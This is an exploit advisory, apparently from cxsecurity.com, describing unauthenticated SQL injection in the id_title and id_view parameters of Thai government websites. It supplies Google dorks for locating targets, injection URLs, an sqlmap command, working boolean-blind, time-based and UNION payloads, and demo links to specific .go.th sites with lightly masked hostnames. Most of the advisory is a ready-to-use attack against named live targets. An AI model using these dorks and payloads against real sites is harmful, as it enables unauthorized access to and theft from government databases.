Thailand Gov Multiple FIle - SQL Injection Vulnerability

2015.10.19
Credit: Shelesh Rauthan
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-89
Dork: intitle:"ยินดีต้อนรับเข้าสู่เว็บไซต์" inurl:"view.php?id_view="

========================================================== [+] Title :- Thailand Gov Multiple FIle - SQL Injection Vulnerability [+] Date :- 19 - Oct - 2015 [+] Version :- All Versions [+] Tested on :- Nginx/1.4.5, PHP/5.2.17, Linux - Windows [+] Category :- webapps [+] Google Dorks :- intitle:"ยินดีต้อนรับเข้าสู่เว็บไซต์" inurl:"view.php?id_view=" intitle:"ยินดีต้อนรับเข้าสู่เว็บไซต์"'inurl:"photo_list.php?id_title=" [+] Exploit Author :- Shelesh Rauthan (ShOrTy420 aKa SEB@sTiaN) [+] Team name :- Team Alastor Breeze, Intelligent-Exploit [+] Official Website :- serverfarming.com, intelligentexploit.com [+] The official Members :- Sh0rTy420, P@rL0u$, !nfIn!Ty, Th3G0v3Rn3R, m777k [+] Greedz to :- @@lu, Lalit, MyLappy<3, Diksha [+] Contact :- fb.com/shelesh.rauthan, indian.1337.hacker@gmail.com, shortycharsobeas@gmail.com ========================================================= [+] Severity Level :- High [+] Request Method(s) :- GET / POST [+] Vulnerable Parameter(s) :- id_title=, id_view= [+] Affected Area(s) :- Entire admin, database, Server [+] About :- Unauthenticated SQL Injection via Multiple Php Files causing an SQL error [+] SQL vulnerable File :- /home/shncom/domains/XXX.go.th/public_html/photo_list.php /home/shncom/domains/XXX.go.th/public_html/view.php [+] POC :- http://127.0.0.1/XXX.php?id_title=[SQL]' The sql Injection web vulnerability can be be exploited by remote attackers without any privilege of web-application user account or user interaction. http://www.[WEBSITE].com/photo_list.php?id_title=7' order by [SQL IN4JECTION]--+ http://www.[WEBSITE].com/photo_list.php?id_title=7' union all select [SQL INJECTION]--+ SQLMap ++++++++++++++++++++++++++ python sqlmap.py --url "http://127.0.0.1/XXX.php?id_view=[SQL]" --dbs ++++++++++++++++++++++++++ --- Parameter: id_title (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: id_title=243' AND 6428=6428 AND 'OThI'='OThI Type: AND/OR time-based blind Title: MySQL >= 5.0.12 AND time-based blind (SELECT) Payload: id_title=243' AND (SELECT * FROM (SELECT(SLEEP(5)))Ohoa) AND 'jvjA'='jvjA Type: UNION query Title: Generic UNION query (NULL) - 4 columns Payload: id_title=243' UNION ALL SELECT NULL,NULL,CONCAT(0x7176717671,0x646167735149594e7552,0x716a707171),NULL-- --- [+] DEMO :- http://www.noXntan.go.th/photo_list.php?id_title=243 http://www.doonoXi.go.th/photo_list.php?id_title=5 http://hiXnkonk.go.th/photo_list.php?id_title=2 http://www.nXongdank.go.th/view.php?id_view=8 http://laoklaXng.go.th/photo_list.php?id_title=17 =======================================================


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top